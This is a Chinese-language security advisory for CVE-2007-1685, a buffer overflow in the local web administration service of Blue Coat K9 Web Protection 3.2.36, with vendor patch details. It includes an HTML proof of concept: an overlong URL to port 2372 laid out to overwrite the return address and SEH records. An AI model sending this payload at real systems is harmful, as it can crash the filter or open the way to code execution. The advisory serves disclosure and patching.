发布日期：2007-06-08
更新日期：2007-06-11

受影响系统：

Blue Coat Systems K9 Web Protection 3.2.36

不受影响系统：

Blue Coat Systems K9 Web Protection 3.2.44

描述：

---

BUGTRAQ  ID: 24373
CVE(CAN) ID: CVE-2007-1685

K9 Web Protection是家用电脑上所使用的内容过滤解决方案，允许用户控制可访问的Internet内容。

K9 Web Protection基于Web的管理服务（k9filter.exe）在处理URL时存在缓冲区溢出漏洞，如果用户向本地主机端口2372发送了超长的HTTP请求的话，就可以触发这个溢出，导致拒绝服务或以系统权限执行任意指令。

<*来源：Dennis Rand （DER@cowi.dk）
  
  链接：http://secunia.com/advisories/25593/
        http://www.csis.dk/dk/forside/Bluecoat-k9.pdf
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head>
<title>CSIS.DK - BlueCoat K9 Web Protection Overflow</title>
<center>
</center>
</head>
<body>
<h4><center> Discovery and Exploit by Dennis Rand - CSIS.DK</h4></center>
<br><b>http://127.0.0.1:2372/home.html[Ax168][DCBA][A x 56][BBBB][AAAA] </b><br>
<br><li> Return Address = DCBA
<br><li> Pointer to the next SEH record = BBBB
<br><li> SE Handler = AAAA
<br>
<center>
<b><A
HREF="http://127.0.0.1:2372/home.htmlAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCC
CDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGHHHHHHHHHHHH
HHHHaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbccccccccDCBAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCC
CCCCCCCCCCCCCDDDDDDDDaaaabbbb">RUN PoC</A></b>
</center>
</body>
</html>

http://www.csis.dk/dk/forside/Bluecoat-k9.pdf

建议：

---

厂商补丁：

Blue Coat Systems
-----------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.k9webprotection.com/download.html

浏览次数：2819
严重程度：0（网友投票）